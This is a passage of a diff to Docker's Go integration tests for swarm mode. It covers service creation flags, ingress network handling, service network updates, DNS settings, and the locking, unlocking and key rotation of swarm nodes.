tc.name, "--label", "x=y", "busybox", "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + name := "top" + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--label", "x=y", "busybox", "top") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[0], tc.name) - c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", name) + c.Assert(err, checker.IsNil) - out, err = d.cmdRetryOutOfSequence("service", "update", 
"--publish-add", tc.publishAdd[1], tc.name) - c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", name) + c.Assert(err, checker.IsNil) - out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[2], "--publish-add", tc.publishAdd[3], tc.name) - c.Assert(err, checker.NotNil, check.Commentf(out)) + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", "--publish-add", "80:20", name) + c.Assert(err, checker.NotNil) - out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", tc.name) - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, tc.ports) - } + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "[{ tcp 80 80 ingress}]") } func (s *DockerSwarmSuite) TestSwarmServiceWithGroup(c *check.C) { d := s.AddDaemon(c, true, true) name := "top" - out, err := d.Cmd("service", "create", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // make sure task has been deployed. 
- waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) out, err = d.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -316,7 +330,7 @@ func (s *DockerSwarmSuite) TestSwarmContainerAutoStart(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf(out)) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - d.Restart() + d.Restart(c) out, err = d.Cmd("ps", "-q") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -330,17 +344,22 @@ func (s *DockerSwarmSuite) TestSwarmContainerEndpointOptions(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf(out)) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - _, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox", "top") + _, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox:glibc", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + _, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox:glibc", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - _, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox", "top") + _, err = d.Cmd("run", "-d", "--net=foo", "--net-alias=third-alias", "busybox:glibc", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - // ping first container and its alias + // ping first container and its alias, also ping third and anonymous container by its alias _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first") c.Assert(err, check.IsNil, check.Commentf(out)) _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first-alias") c.Assert(err, check.IsNil, check.Commentf(out)) + _, err = d.Cmd("exec", "second", "ping", "-c", "1", "third-alias") + c.Assert(err, check.IsNil, check.Commentf(out)) } func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) { @@ -354,12 +373,12 @@ func (s 
*DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) { out, err = d.Cmd("run", "-d", "--net", networkID, "busybox", "top") c.Assert(err, checker.IsNil) cID := strings.TrimSpace(out) - d.waitRun(cID) + d.WaitRun(cID) _, err = d.Cmd("rm", "-f", cID) c.Assert(err, checker.IsNil) - out, err = d.Cmd("network", "rm", "testnet") + _, err = d.Cmd("network", "rm", "testnet") c.Assert(err, checker.IsNil) checkNetwork := func(*check.C) (interface{}, check.CommentInterface) { @@ -406,7 +425,7 @@ func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf(out)) // Leave the swarm - err = d.Leave(true) + err = d.SwarmLeave(true) c.Assert(err, checker.IsNil) // Check the container is disconnected @@ -420,14 +439,99 @@ func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) { c.Assert(out, checker.Not(checker.Contains), nwName) } -func (s *DockerSwarmSuite) TestSwarmRemoveInternalNetwork(c *check.C) { +func (s *DockerSwarmSuite) TestOverlayAttachableReleaseResourcesOnFailure(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create attachable network + out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", "--subnet", "10.10.9.0/24", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Attach a container with specific IP + out, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c1", "--ip", "10.10.9.33", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Attempt to attach another container with same IP, must fail + _, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c2", "--ip", "10.10.9.33", "busybox", "top") + c.Assert(err, checker.NotNil) + + // Remove first container + out, err = d.Cmd("rm", "-f", "c1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Verify the network can be removed, no phantom network attachment task left over + out, err = d.Cmd("network", "rm", "ovnet") + c.Assert(err, 
checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmIngressNetwork(c *check.C) { d := s.AddDaemon(c, true, true) - name := "ingress" - out, err := d.Cmd("network", "rm", name) + // Ingress network can be removed + removeNetwork := func(name string) *icmd.Result { + return cli.Docker( + cli.Args("-H", d.Sock(), "network", "rm", name), + cli.WithStdin(strings.NewReader("Y"))) + } + + result := removeNetwork("ingress") + result.Assert(c, icmd.Success) + + // And recreated + out, err := d.Cmd("network", "create", "-d", "overlay", "--ingress", "new-ingress") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // But only one is allowed + out, err = d.Cmd("network", "create", "-d", "overlay", "--ingress", "another-ingress") c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Contains, name) - c.Assert(strings.TrimSpace(out), checker.Contains, "is a pre-defined network and cannot be removed") + c.Assert(strings.TrimSpace(out), checker.Contains, "is already present") + + // It cannot be removed if it is being used + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv1", "-p", "9000:8000", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + result = removeNetwork("new-ingress") + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "ingress network cannot be removed because service", + }) + + // But it can be removed once no more services depend on it + out, err = d.Cmd("service", "update", "--detach", "--publish-rm", "9000:8000", "srv1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + result = removeNetwork("new-ingress") + result.Assert(c, icmd.Success) + + // A service which needs the ingress network cannot be created if no ingress is present + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv2", "-p", "500:500", "busybox", "top") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "no 
ingress network is present") + + // An existing service cannot be updated to use the ingress nw if the nw is not present + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "9000:8000", "srv1") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "no ingress network is present") + + // But services which do not need routing mesh can be created regardless + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv3", "--endpoint-mode", "dnsrr", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmCreateServiceWithNoIngressNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Remove ingress network + result := cli.Docker( + cli.Args("-H", d.Sock(), "network", "rm", "ingress"), + cli.WithStdin(strings.NewReader("Y"))) + result.Assert(c, icmd.Success) + + // Create a overlay network and launch a service on it + // Make sure nothing panics because ingress network is missing + out, err := d.Cmd("network", "create", "-d", "overlay", "another-network") + c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv4", "--network", "another-network", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) } // Test case for #24108, also the case from: @@ -436,7 +540,7 @@ func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) { d := s.AddDaemon(c, true, true) name := "redis-cluster-md5" - out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--replicas=3", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -470,7 +574,7 @@ func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) { c.Assert(out, checker.Not(checker.Contains), name+".3") name 
= "redis-cluster-sha1" - out, err = d.Cmd("service", "create", "--name", name, "--mode=global", "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--mode=global", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -499,12 +603,12 @@ func (s *DockerSwarmSuite) TestPsListContainersFilterIsTask(c *check.C) { bareID := strings.TrimSpace(out)[:12] // Create a service name := "busybox-top" - out, err = d.Cmd("service", "create", "--name", name, "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceRunningTasks(name), checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckServiceRunningTasks(name), checker.Equals, 1) // Filter non-tasks out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=false") @@ -713,12 +817,12 @@ func (s *DockerSwarmSuite) TestSwarmNetworkPlugin(c *check.C) { func (s *DockerSwarmSuite) TestSwarmServiceEnvFile(c *check.C) { d := s.AddDaemon(c, true, true) - path := filepath.Join(d.folder, "env.txt") + path := filepath.Join(d.Folder, "env.txt") err := ioutil.WriteFile(path, []byte("VAR1=A\nVAR2=A\n"), 0644) c.Assert(err, checker.IsNil) name := "worker" - out, err := d.Cmd("service", "create", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -737,14 +841,14 @@ func (s 
*DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) { // Without --tty expectedOutput := "none" - out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", ttyCheck) + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", ttyCheck) c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) // We need to get the container id. - out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + out, err = d.Cmd("ps", "-q", "--no-trunc") c.Assert(err, checker.IsNil) id := strings.TrimSpace(out) @@ -756,18 +860,18 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) { out, err = d.Cmd("service", "rm", name) c.Assert(err, checker.IsNil) // Make sure container has been destroyed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0) // With --tty expectedOutput = "TTY" - out, err = d.Cmd("service", "create", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck) + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck) c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) // We need to get the container id. 
- out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + out, err = d.Cmd("ps", "-q", "--no-trunc") c.Assert(err, checker.IsNil) id = strings.TrimSpace(out) @@ -781,17 +885,17 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) { // Create a service name := "top" - _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Equals, "false") - _, err = d.Cmd("service", "update", "--tty", name) + _, err = d.Cmd("service", "update", "--detach", "--tty", name) c.Assert(err, checker.IsNil) out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) @@ -799,16 +903,55 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, "true") } +func (s *DockerSwarmSuite) TestSwarmServiceNetworkUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + result := icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "foo")) + result.Assert(c, icmd.Success) + fooNetwork := strings.TrimSpace(string(result.Combined())) + + result = icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "bar")) + result.Assert(c, icmd.Success) + barNetwork := strings.TrimSpace(string(result.Combined())) + + result = icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "baz")) + result.Assert(c, icmd.Success) + bazNetwork := strings.TrimSpace(string(result.Combined())) + + // Create a service + name := "top" + result = 
icmd.RunCmd(d.Command("service", "create", "--detach", "--no-resolve-image", "--network", "foo", "--network", "bar", "--name", name, "busybox", "top")) + result.Assert(c, icmd.Success) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals, + map[string]int{fooNetwork: 1, barNetwork: 1}) + + // Remove a network + result = icmd.RunCmd(d.Command("service", "update", "--detach", "--network-rm", "foo", name)) + result.Assert(c, icmd.Success) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals, + map[string]int{barNetwork: 1}) + + // Add a network + result = icmd.RunCmd(d.Command("service", "update", "--detach", "--network-add", "baz", name)) + result.Assert(c, icmd.Success) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals, + map[string]int{barNetwork: 1, bazNetwork: 1}) +} + func (s *DockerSwarmSuite) TestDNSConfig(c *check.C) { d := s.AddDaemon(c, true, true) // Create a service name := "top" - _, err := d.Cmd("service", "create", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top") + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top") c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) // We need to get the container id. 
out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") @@ -831,13 +974,13 @@ func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) { // Create a service name := "top" - _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) - _, err = d.Cmd("service", "update", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name) + _, err = d.Cmd("service", "update", "--detach", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name) c.Assert(err, checker.IsNil) out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.DNSConfig }}", name) @@ -845,6 +988,68 @@ func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, "{[1.2.3.4] [example.com] [timeout:3]}") } +func getNodeStatus(c *check.C, d *daemon.Daemon) swarm.LocalNodeState { + info := d.SwarmInfo(c) + return info.LocalNodeState +} + +func checkKeyIsEncrypted(d *daemon.Daemon) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + keyBytes, err := ioutil.ReadFile(filepath.Join(d.Folder, "root", "swarm", "certificates", "swarm-node.key")) + if err != nil { + return fmt.Errorf("error reading key: %v", err), nil + } + + keyBlock, _ := pem.Decode(keyBytes) + if keyBlock == nil { + return fmt.Errorf("invalid PEM-encoded private key"), nil + } + + return keyutils.IsEncryptedPEMBlock(keyBlock), nil + } +} + +func checkSwarmLockedToUnlocked(c *check.C, d *daemon.Daemon, unlockKey string) { + // Wait for the PEM file to become unencrypted + 
waitAndAssert(c, defaultReconciliationTimeout, checkKeyIsEncrypted(d), checker.Equals, false) + + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) +} + +func checkSwarmUnlockedToLocked(c *check.C, d *daemon.Daemon) { + // Wait for the PEM file to become encrypted + waitAndAssert(c, defaultReconciliationTimeout, checkKeyIsEncrypted(d), checker.Equals, true) + + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) +} + +func (s *DockerSwarmSuite) TestUnlockEngineAndUnlockedSwarm(c *check.C) { + d := s.AddDaemon(c, false, false) + + // unlocking a normal engine should return an error - it does not even ask for the key + cmd := d.Command("swarm", "unlock") + result := icmd.RunCmd(cmd) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + c.Assert(result.Combined(), checker.Contains, "Error: This node is not part of a swarm") + c.Assert(result.Combined(), checker.Not(checker.Contains), "Please enter unlock key") + + _, err := d.Cmd("swarm", "init") + c.Assert(err, checker.IsNil) + + // unlocking an unlocked swarm should return an error - it does not even ask for the key + cmd = d.Command("swarm", "unlock") + result = icmd.RunCmd(cmd) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + c.Assert(result.Combined(), checker.Contains, "Error: swarm is not locked") + c.Assert(result.Combined(), checker.Not(checker.Contains), "Please enter unlock key") +} + func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { d := s.AddDaemon(c, false, false) @@ -866,30 +1071,26 @@ func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { outs, err = d.Cmd("swarm", "unlock-key", "-q") c.Assert(outs, checker.Equals, unlockKey+"\n") - info, err := d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d.Restart(), checker.IsNil) - - info, err = d.info() - 
c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + // It starts off locked + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) - cmd := d.command("swarm", "unlock") + cmd := d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString("wrong-secret-key") - out, err := cmd.CombinedOutput() - c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) - c.Assert(string(out), checker.Contains, "invalid key") + icmd.RunCmd(cmd).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "invalid key", + }) - cmd = d.command("swarm", "unlock") + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) + + cmd = d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(unlockKey) - out, err = cmd.CombinedOutput() - c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + icmd.RunCmd(cmd).Assert(c, icmd.Success) - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) outs, err = d.Cmd("node", "ls") c.Assert(err, checker.IsNil) @@ -898,14 +1099,7 @@ func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { outs, err = d.Cmd("swarm", "update", "--autolock=false") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - // Wait for autolock to be turned off - time.Sleep(time.Second) - - c.Assert(d.Restart(), checker.IsNil) - - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + checkSwarmLockedToUnlocked(c, d, unlockKey) outs, err = d.Cmd("node", "ls") c.Assert(err, checker.IsNil) @@ -918,30 +1112,181 @@ func (s *DockerSwarmSuite) TestSwarmLeaveLocked(c *check.C) { outs, err := d.Cmd("swarm", "init", "--autolock") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - 
c.Assert(d.Restart("--swarm-default-advertise-addr=lo"), checker.IsNil) + // It starts off locked + d.Restart(c, "--swarm-default-advertise-addr=lo") - info, err := d.info() - c.Assert(err, checker.IsNil) + info := d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) outs, _ = d.Cmd("node", "ls") c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + // `docker swarm leave` a locked swarm without --force will return an error + outs, _ = d.Cmd("swarm", "leave") + c.Assert(outs, checker.Contains, "Swarm is encrypted and locked.") + + // It is OK for user to leave a locked swarm with --force outs, err = d.Cmd("swarm", "leave", "--force") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - info, err = d.info() - c.Assert(err, checker.IsNil) + info = d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) outs, err = d.Cmd("swarm", "init") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - info, err = d.info() - c.Assert(err, checker.IsNil) + info = d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) } +func (s *DockerSwarmSuite) TestSwarmLockUnlockCluster(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + // they start off unlocked + d2.Restart(c) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // stop this one so it does not get autolock info + d2.Stop(c) + + // enable autolock + outs, err := d1.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d1.Cmd("swarm", 
"unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + // The ones that got the cluster update should be set to locked + for _, d := range []*daemon.Daemon{d1, d3} { + checkSwarmUnlockedToLocked(c, d) + + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + } + + // d2 never got the cluster update, so it is still set to unlocked + d2.Start(c) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // d2 is now set to lock + checkSwarmUnlockedToLocked(c, d2) + + // leave it locked, and set the cluster to no longer autolock + outs, err = d1.Cmd("swarm", "update", "--autolock=false") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + // the ones that got the update are now set to unlocked + for _, d := range []*daemon.Daemon{d1, d3} { + checkSwarmLockedToUnlocked(c, d, unlockKey) + } + + // d2 still locked + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateLocked) + + // unlock it + cmd := d2.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // once it's caught up, d2 is set to not be locked + checkSwarmLockedToUnlocked(c, d2, unlockKey) + + // managers who join now are never set to locked in the first place + d4 := s.AddDaemon(c, true, true) + d4.Restart(c) + c.Assert(getNodeStatus(c, d4), checker.Equals, swarm.LocalNodeStateActive) +} + +func (s *DockerSwarmSuite) TestSwarmJoinPromoteLocked(c *check.C) { + d1 := s.AddDaemon(c, true, true) + + // enable autolock + outs, err := d1.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range 
strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d1.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + // joined workers start off unlocked + d2 := s.AddDaemon(c, true, false) + d2.Restart(c) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // promote worker + outs, err = d1.Cmd("node", "promote", d2.NodeID()) + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Contains, "promoted to a manager in the swarm") + + // join new manager node + d3 := s.AddDaemon(c, true, true) + + // both new nodes are locked + for _, d := range []*daemon.Daemon{d2, d3} { + checkSwarmUnlockedToLocked(c, d) + + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + } + + // demote manager back to worker - workers are not locked + outs, err = d1.Cmd("node", "demote", d3.NodeID()) + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Contains, "demoted in the swarm") + + // Wait for it to actually be demoted, for the key and cert to be replaced. + // Then restart and assert that the node is not locked. 
If we don't wait for the cert + // to be replaced, then the node still has the manager TLS key which is still locked + // (because we never want a manager TLS key to be on disk unencrypted if the cluster + // is set to autolock) + waitAndAssert(c, defaultReconciliationTimeout, d3.CheckControlAvailable, checker.False) + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + certBytes, err := ioutil.ReadFile(filepath.Join(d3.Folder, "root", "swarm", "certificates", "swarm-node.crt")) + if err != nil { + return "", check.Commentf("error: %v", err) + } + certs, err := helpers.ParseCertificatesPEM(certBytes) + if err == nil && len(certs) > 0 && len(certs[0].Subject.OrganizationalUnit) > 0 { + return certs[0].Subject.OrganizationalUnit[0], nil + } + return "", check.Commentf("could not get organizational unit from certificate") + }, checker.Equals, "swarm-worker") + + // by now, it should *never* be locked on restart + d3.Restart(c) + c.Assert(getNodeStatus(c, d3), checker.Equals, swarm.LocalNodeStateActive) +} + func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { d := s.AddDaemon(c, true, true) @@ -972,20 +1317,17 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { c.Assert(newUnlockKey, checker.Not(checker.Equals), "") c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey) - c.Assert(d.Restart(), checker.IsNil) - - info, err := d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) outs, _ = d.Cmd("node", "ls") c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") - cmd := d.command("swarm", "unlock") + cmd := d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(unlockKey) - out, err := cmd.CombinedOutput() + result 